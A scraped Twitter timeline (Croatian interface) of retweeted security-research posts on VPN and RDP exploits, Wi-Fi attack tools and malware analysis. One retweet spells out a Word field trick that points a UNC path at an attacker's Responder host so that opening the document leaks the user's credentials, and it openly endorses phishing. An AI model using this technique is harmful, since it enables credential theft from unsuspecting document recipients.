Tweetovi

Blokirali ste korisnika/cu @laurendotzip

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @laurendotzip

  1. proslijedio/la je Tweet
    9. sij

    Have reproduced Citrix SSL VPN pre-auth RCE successfully on both local and remote. Interesting bug!

    Poništi
  2. proslijedio/la je Tweet
    24. pro 2019.
    Poništi
  3. proslijedio/la je Tweet
    4. pro 2019.

    Are you avian a hard time with AWS? Of corvus we know such auspices are very hard to read. Why not aves a go with awspx from our resident augur Craig Koorn.

    Poništi
  4. proslijedio/la je Tweet
    5. pro 2019.

    Thanks and for the chance to present at my research and tool. Here details of URI persistence technique with demo videos: . Code:

    Poništi
  5. proslijedio/la je Tweet
    2. pro 2019.

    I wrote a thing about getting shells through Logitech Unifying dongles. Let me know what you think!

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    28. stu 2019.

    Earlier this year I got to hack at the original Doom using together with and . Here is a writeup with the details where we go through how we added our own cheat codes!

    Poništi
  7. proslijedio/la je Tweet
    28. lis 2019.

    Gabriel has done an amazing job of writing up the recent history of wifi hacking and rogue AP attacks, as well as implementing them in his easy to use eap hammer tool.

    Poništi
  8. 27. kol 2019.
    Poništi
  9. proslijedio/la je Tweet
    25. srp 2019.

    Published a little write up on the wpa_sycophant tool I created for relaying PEAP last year.

    Poništi
  10. proslijedio/la je Tweet
    21. kol 2019.

    Making an antivirus engine : the guidelines Very useful reference to understand basic AV internals!

    Poništi
  11. proslijedio/la je Tweet
    16. kol 2019.

    Responder 2.3.4.0 upcoming release will be supporting RDP ;)

    Poništi
  12. proslijedio/la je Tweet
    15. kol 2019.

    Gootkit Banking Trojan | Deep Dive into Anti-Analysis Features

    Poništi
  13. proslijedio/la je Tweet
    15. kol 2019.
    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet

    Got an RDP crash PoC working for DejaBlue! Either CVE-2019-1181 or CVE-2019-1182 because it works on Win7 to Win10. Nice heap overflow with arbitrary data + size, should be fairly easy to get reliable RCE.

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    14. kol 2019.

    Registration for this year's FLARE-On Challenge is open and starts tomorrow

    Poništi
  16. proslijedio/la je Tweet
    13. kol 2019.

    Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!

    Poništi
  17. proslijedio/la je Tweet
    11. kol 2019.

    JANUARY 1ST: This is gonna be my year. AUGUST:

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    12. kol 2019.

    (PDF Slides) My presentation at DEF CON 27 follow... .NET Malware Threat: Internals and Reversing:

    Poništi
  19. proslijedio/la je Tweet
    12. kol 2019.
    Poništi
  20. proslijedio/la je Tweet
    24. lip 2019.
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·